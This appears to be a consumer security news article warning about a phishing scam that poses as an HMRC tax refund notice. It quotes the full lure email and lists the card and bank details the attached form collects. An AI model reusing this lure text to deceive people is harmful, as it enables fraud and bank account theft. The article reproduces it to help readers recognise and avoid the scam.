Open an Attachment and Get a Tax Refund from HRMC, Phishing Scam

Never trust an email that requests complete credit card information

  HMRC phishing webpage
Emails that allegedly come from the UK tax organization HM Revenue and Customs (HMRC) are promising recipients a tax refund if they open an attachment and provide sensitive information. In reality, it’s nothing but a clever phishing scam.

Emails that allegedly come from the UK tax organization HM Revenue and Customs (HMRC) are promising recipients a tax refund if they open an attachment and provide sensitive information. In reality, it’s nothing but a clever phishing scam.

Baring the subject “Tax refund notification,” the email, provided by Sophos’ Naked Security blog reads:

Dear Taxpayer,

After the last annual calculations of your fiscal activity we have determined that you are eligible to receive a tax refund of 223.56 GBP.

Please submit the tax refund request and allow us 6-9 days in order to process it.

To access your tax refund, please follow the steps below:
- download the Tax Refund Form attached to this email
- open it in a browser
- follow the instructions on your screen

A refund can be delayed for a variety of reasons. For example submitting invalid records or applying after the deadline.


The attached form requires things such as full name, date of birth, address, phone number, sort code, card number, card expiry date and security code, which is more than enough to gain control of someone’s bank account.

To make everything more realistic, the crooks even put a note on the bottom of the phishing page, advising users to close the browser after the “refund process” is completed.

The attachment found in the malicious email was detected by Sophos security products as Mal/Phish-A which means that an updated protection software can prevent unfortunate incidents.

If you encounter such emails, I recommend that you ignore the requests they make. If you believe you are truly eligible for a tax refund, contact HMRC directly, using the information provided on their official website.

Never use email addresses or phone numbers contained in suspicious messages since in most scenarios they’re cleverly set up to make everything look legitimate.

Comments